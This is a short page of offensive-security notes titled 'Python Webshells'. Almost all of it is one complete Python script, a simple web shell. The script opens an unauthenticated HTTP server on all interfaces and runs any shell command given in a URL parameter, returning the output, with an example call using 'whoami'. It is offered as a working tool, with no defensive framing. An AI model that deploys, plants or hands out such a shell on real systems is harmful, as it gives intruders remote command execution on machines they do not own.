Python Webshells

- Simple Python Webshell

# http://127.0.0.1:1234/cmd?c=whoami
import http.server
import socketserver
import urllib.parse
import subprocess
PORT = 1234  
class WebShellHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path.startswith("/cmd?"):
            query = urllib.parse.urlparse(self.path).query
            params = urllib.parse.parse_qs(query)
            command = params.get("c", [""])[0]
            if command:
                try:
                    output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT, text=True)
                except subprocess.CalledProcessError as e:
                    output = e.output
            else:
                output = "No command provided."
            self.send_response(200)
            self.send_header("Content-type", "text/html")
            self.end_headers()
            self.wfile.write(f"<pre>{output}</pre>".encode())
        else:
            self.send_response(404)
            self.end_headers()
            self.wfile.write(b"Not Found")
with socketserver.TCPServer(("0.0.0.0", PORT), WebShellHandler) as httpd:
    print(f"[*] Webshell corriendo en el puerto {PORT}")
    httpd.serve_forever()